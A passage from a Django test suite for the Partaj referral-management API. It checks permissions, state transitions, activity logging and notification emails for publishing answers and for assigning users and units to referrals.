self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition PUBLISH_ANSWER not allowed from state answered."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_closed_state(self, mock_mailer_send):
"""
A referral in the CLOSED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition PUBLISH_ANSWER not allowed from state closed."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
mock_mailer_send.assert_not_called()
# ASSIGN TESTS
def test_assign_referral_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot perform actions, including assignments.
"""
referral = factories.ReferralFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_random_logged_in_user(self, mock_mailer_send):
"""
Any random logged in user cannot assign a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_linked_user(self, mock_mailer_send):
"""
The referral's creator cannot assign it.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(user=user)
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_by_linked_unit_member(self, mock_mailer_send):
"""
Regular members of the linked unit cannot assign a referral.
"""
referral = factories.ReferralFactory()
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": "42", "unit": str(referral.units.get().id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
    def test_assign_referral_by_linked_unit_organizer(self, mock_mailer_send):
        """
        Organizers of the linked unit can assign a referral.

        Expects a 200 response, the referral moving to the ASSIGNED state, one
        ASSIGNED activity authored by the organizer, and a notification email
        sent to the new assignee.
        """
        referral = factories.ReferralFactory()
        # An OWNER of the referral's unit acts as the organizer making the request.
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        # The assignee is a (default-role) member of the same unit.
        assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign/",
            {"assignee": assignee.id},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # The API response reflects the new state and the single assignee.
        self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
        self.assertEqual(len(response.json()["assignees"]), 1)
        self.assertEqual(response.json()["assignees"][0]["id"], str(assignee.id))
        referral.refresh_from_db()
        self.assertEqual(referral.assignees.count(), 1)
        self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
        # Exactly one ASSIGNED activity was recorded for this actor/referral pair.
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED,
                referral=referral,
            ).count(),
            1,
        )
        # The notification payload is checked verbatim against the mocked mailer.
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": (
                        f"https://partaj/app/unit/{referral.units.get().id}"
                        f"/referrals-list/referral-detail/{referral.id}"
                    ),
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": referral.units.get().name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
                "to": [{"email": assignee.email}],
            },
        )
def test_assign_already_assigned_referral(self, mock_mailer_send):
"""
A referral which was assigned to one user can be assigned to an additional one,
staying in the ASSIGNED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
exsting_assignee = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
).assignee
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
self.assertEqual(len(response.json()["assignees"]), 2)
self.assertEqual(
response.json()["assignees"][0]["id"],
str(exsting_assignee.id),
)
self.assertEqual(
response.json()["assignees"][1]["id"],
str(assignee.id),
)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 2)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.ASSIGNED,
referral=referral,
).count(),
1,
)
mock_mailer_send.assert_called_with(
{
"params": {
"assigned_by": user.get_full_name(),
"case_number": referral.id,
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
"urgency": referral.urgency_level.name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
"to": [{"email": assignee.email}],
},
)
    def test_assign_referral_from_processing_state(self, mock_mailer_send):
        """
        New assignments can be added on a referral in the PROCESSING state, the referral
        then stays in the PROCESSING state.

        Expects a 200 response, one ASSIGNED activity, and a notification email
        to the new assignee; the state must NOT change back to ASSIGNED.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign/",
            {"assignee": assignee.id},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # The state is unchanged by the new assignment.
        self.assertEqual(response.json()["state"], models.ReferralState.PROCESSING)
        self.assertEqual(len(response.json()["assignees"]), 1)
        self.assertEqual(response.json()["assignees"][0]["id"], str(assignee.id))
        referral.refresh_from_db()
        self.assertEqual(referral.assignees.count(), 1)
        self.assertEqual(referral.state, models.ReferralState.PROCESSING)
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED,
                referral=referral,
            ).count(),
            1,
        )
        # The notification payload is checked verbatim against the mocked mailer.
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": (
                        f"https://partaj/app/unit/{referral.units.get().id}"
                        f"/referrals-list/referral-detail/{referral.id}"
                    ),
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": referral.units.get().name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
                "to": [{"email": assignee.email}],
            },
        )
    def test_assign_referral_from_in_validation_state(self, mock_mailer_send):
        """
        New assignments can be added on a referral in the IN_VALIDATION state, the
        referral then stays in the IN_VALIDATION state.

        Expects a 200 response, one ASSIGNED activity, and a notification email
        to the new assignee; the state must NOT change back to ASSIGNED.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign/",
            {"assignee": assignee.id},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # The state is unchanged by the new assignment.
        self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
        self.assertEqual(len(response.json()["assignees"]), 1)
        self.assertEqual(response.json()["assignees"][0]["id"], str(assignee.id))
        referral.refresh_from_db()
        self.assertEqual(referral.assignees.count(), 1)
        self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED,
                referral=referral,
            ).count(),
            1,
        )
        # The notification payload is checked verbatim against the mocked mailer.
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": (
                        f"https://partaj/app/unit/{referral.units.get().id}"
                        f"/referrals-list/referral-detail/{referral.id}"
                    ),
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": referral.units.get().name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_TEMPLATE_ID"],
                "to": [{"email": assignee.email}],
            },
        )
def test_assign_referral_from_answered_state(self, mock_mailer_send):
"""
No new assignments can be added on a referral in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN not allowed from state answered."]},
)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_referral_from_closed_state(self, mock_mailer_send):
"""
No new assignments can be added on a referral in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignee": assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition ASSIGN not allowed from state closed."]},
)
referral.refresh_from_db()
self.assertEqual(referral.assignees.count(), 0)
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
# UNASSIGN TESTS
def test_unassign_referral_by_anonymous_user(self, _):
"""
Anonymous users cannot perform actions, including assignment removals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignment": assignment.id},
)
self.assertEqual(response.status_code, 401)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_random_logged_in_user(self, _):
"""
Any random logged in user cannot unassign an assignee from a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignment": assignment.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_linked_user(self, _):
"""
The referral's creator cannot unassign an assignee from it.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.ASSIGNED, user=user
)
assignment = factories.ReferralAssignmentFactory(
referral=referral, unit=referral.units.get()
)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignment": assignment.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_linked_unit_member(self, _):
"""
Regular members of the linked unit cannot unassign anyone (incl. themselves)
from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignee = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER
).user
assignment = factories.ReferralAssignmentFactory(
assignee=assignee,
referral=referral,
unit=referral.units.get(),
)
response = self.client.post(
f"/api/referrals/{referral.id}/assign/",
{"assignment": assignment.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=assignment.assignee)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_by_linked_unit_organizer(self, _):
"""
Organizers of the linked unit can unassign a member from a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.RECEIVED)
self.assertEqual(response.json()["assignees"], [])
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(referral.assignees.count(), 0)
def test_unassign_referral_still_assigned_state(self, _):
"""
When a member is unassigned from a referral which has other assignees, the
referral remains in state ASSIGNED instead of moving to RECEIVED.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
assignment_to_remove = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment_to_remove.created_by
assignment_to_keep = factories.ReferralAssignmentFactory(referral=referral)
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment_to_remove.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
self.assertEqual(len(response.json()["assignees"]), 1)
self.assertEqual(
response.json()["assignees"][0]["id"], str(assignment_to_keep.assignee.id)
)
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_from_processing_state(self, _):
"""
Users can be unassigned from units in the PROCESSING state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.PROCESSING)
self.assertEqual(response.json()["assignees"], [])
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
self.assertEqual(referral.assignees.count(), 0)
def test_unassign_referral_from_in_validation_state(self, _):
"""
Users can be unassigned from units in the IN_VALIDATION state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(response.json()["assignees"], [])
self.assertEqual(
models.ReferralActivity.objects.filter(
actor=user,
verb=models.ReferralActivityVerb.UNASSIGNED,
referral=referral,
).count(),
1,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
self.assertEqual(referral.assignees.count(), 0)
def test_unassign_referral_from_received_state(self, _):
"""
Users cannot be unassigned from units in the RECEIVED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition UNASSIGN not allowed from state received."]},
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.RECEIVED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_from_answered_state(self, _):
"""
Users cannot be unassigned from units in the ANSWERED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition UNASSIGN not allowed from state answered."]},
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ANSWERED)
self.assertEqual(referral.assignees.count(), 1)
def test_unassign_referral_from_closed_state(self, _):
"""
Users cannot be unassigned from units in the CLOSED state.
"""
referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
assignment = factories.ReferralAssignmentFactory(
referral=referral,
unit=referral.units.get(),
)
user = assignment.created_by
response = self.client.post(
f"/api/referrals/{referral.id}/unassign/",
{"assignee": assignment.assignee.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition UNASSIGN not allowed from state closed."]},
)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.CLOSED)
self.assertEqual(referral.assignees.count(), 1)
# ASSIGN UNIT TESTS
def test_assign_unit_referral_by_anonymous_user(self, mock_mailer_send):
"""
Anonymous users cannot assign units to referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
)
self.assertEqual(response.status_code, 401)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_random_logged_in_user(self, mock_mailer_send):
"""
Random logged-in users cannot assign units to referrals.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_linked_user(self, mock_mailer_send):
"""
A referral's linked user cannot assign units to their referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.ASSIGNED, user=user
)
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
def test_assign_unit_referral_by_linked_unit_member(self, mock_mailer_send):
"""
A member of a referral's linked unit cannot assign units to referrals.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.MEMBER, unit=referral.units.get()
).user
other_unit = factories.UnitFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": str(other_unit.id)},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
    def test_assign_unit_referral_by_linked_unit_organizer(self, mock_mailer_send):
        """
        An organizer of a referral's linked unit can assign units to referrals.

        Expects a 200 response, the new unit appended after the initial one, one
        ASSIGNED_UNIT activity, and a notification email to the new unit's owner.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
        initial_unit = referral.units.get()
        # An OWNER of the referral's unit acts as the organizer making the request.
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        other_unit = factories.UnitFactory()
        # The new unit's owner is the expected recipient of the notification.
        other_unit_owner = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=other_unit
        ).user
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign_unit/",
            {"unit": str(other_unit.id)},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json()["state"], models.ReferralState.ASSIGNED)
        # Both units are returned, the initial one first.
        self.assertEqual(len(response.json()["units"]), 2)
        self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
        self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
        referral.refresh_from_db()
        self.assertEqual(referral.units.count(), 2)
        self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
        self.assertEqual(
            models.ReferralActivity.objects.filter(
                actor=user,
                verb=models.ReferralActivityVerb.ASSIGNED_UNIT,
                referral=referral,
            ).count(),
            1,
        )
        link = (
            f"https://partaj/app/unit/{str(other_unit.id)}"
            f"/referrals-list/referral-detail/{referral.id}"
        )
        # The notification payload is checked verbatim against the mocked mailer.
        mock_mailer_send.assert_called_with(
            {
                "params": {
                    "assigned_by": user.get_full_name(),
                    "case_number": referral.id,
                    "link_to_referral": link,
                    "requester": referral.requester,
                    "topic": referral.topic.name,
                    "unit_name": other_unit.name,
                    "urgency": referral.urgency_level.name,
                },
                "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
                "templateId": settings.SENDINBLUE["REFERRAL_ASSIGNED_UNIT_TEMPLATE_ID"],
                "to": [{"email": other_unit_owner.email}],
            }
        )
def test_assign_unit_referral_nonexistent_unit(self, mock_mailer_send):
"""
The request returns an error response when the user attempts to assign a unit
that does not exist.
"""
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
user = factories.UnitMembershipFactory(
role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
).user
random_uuid = uuid.uuid4()
response = self.client.post(
f"/api/referrals/{referral.id}/assign_unit/",
{"unit": random_uuid},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": [f"Unit {random_uuid} does not exist."]},
)
referral.refresh_from_db()
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
self.assertEqual(
models.ReferralActivity.objects.count(),
0,
)
mock_mailer_send.assert_not_called()
    def test_assign_unit_referral_redundant_assignment(self, mock_mailer_send):
        """
        The request returns an error response when the user attempts to assign a unit
        that is already linked to the referral.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        # NOTE(review): the atomic block presumably isolates the integrity error the
        # duplicate assignment raises so later queries still work — confirm intent.
        with transaction.atomic():
            response = self.client.post(
                f"/api/referrals/{referral.id}/assign_unit/",
                # Re-assign the unit that is already linked to the referral.
                {"unit": str(referral.units.get().id)},
                HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
            )
        self.assertEqual(response.status_code, 400)
        self.assertEqual(
            response.json(),
            {
                "errors": [
                    f"Unit {referral.units.get().id} is already assigned to referral."
                ]
            },
        )
        # Nothing changed: still one unit, same state, no activity, no email.
        referral.refresh_from_db()
        self.assertEqual(referral.units.count(), 1)
        self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
        self.assertEqual(
            models.ReferralActivity.objects.count(),
            0,
        )
        mock_mailer_send.assert_not_called()
    def test_assign_unit_referral_from_received_state(self, mock_mailer_send):
        """
        New unit assignments can be added on a referral in the RECEIVED state.
        """
        referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
        initial_unit = referral.units.get()
        user = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=referral.units.get()
        ).user
        other_unit = factories.UnitFactory()
        other_unit_owner = factories.UnitMembershipFactory(
            role=models.UnitMembershipRole.OWNER, unit=other_unit
        ).user
        self.assertEqual(referral.units.count(), 1)
        response = self.client.post(
            f"/api/referrals/{referral.id}/assign_unit/",
            {"unit": str(other_unit.id)},
            HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
        )
        self.assertEqual(response.status_code, 200)
        # State is unchanged; the new unit is appended after the initial one
        # in the serialized payload.
        self.assertEqual(response.json()["state"], models.ReferralState.RECEIVED)
        self.assertEqual(len(response.json()["units"]), 2)
        self.assertEqual(response.json()["units"][0]["id"], str(initial_unit.id))
        self.assertEqual(response.json()["units"][1]["id"], str(other_unit.id))
        referral.refresh_from_db()
        self.assertEqual(referral.units.count(), 2)
        self.assertEqual(referral.state, models.ReferralState.RECEIVED)
